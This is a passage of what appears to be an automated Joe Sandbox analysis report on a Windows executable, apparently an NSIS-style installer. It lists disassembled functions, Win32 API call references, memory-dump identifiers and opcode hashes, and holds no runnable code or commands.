                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                              • API String ID: 2266616436-4211696005
                                                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 769 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 780 402223-4030f2 call 4062cf 769->780 781 40220d-40221b call 4062cf 769->781 781->780
                                                                                              APIs
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427179,774D23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427179,774D23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                              • API String ID: 3156913733-2180253247
                                                                                              • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                              • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                              • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                              • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 789 405eab-405eb7 790 405eb8-405eec GetTickCount GetTempFileNameW 789->790 791 405efb-405efd 790->791 792 405eee-405ef0 790->792 794 405ef5-405ef8 791->794 792->790 793 405ef2 792->793 793->794
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: nsa
                                                                                              • API String ID: 1716503409-2209301699
                                                                                              • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                              • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                              • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                              • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 795 402175-40218b call 401446 * 2 800 402198-40219d 795->800 801 40218d-402197 call 4062cf 795->801 803 4021aa-4021b0 EnableWindow 800->803 804 40219f-4021a5 ShowWindow 800->804 801->800 806 4030e3-4030f2 803->806 804->806
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                              • String ID: HideWindow
                                                                                              • API String ID: 1249568736-780306582
                                                                                              • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                              • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                              • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                              • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                              • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                              APIs
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID:
                                                                                              • API String ID: 4115351271-0
                                                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1293932590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1293911636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293952116.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1293970533.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1294117506.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_sXpIsdpkzy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
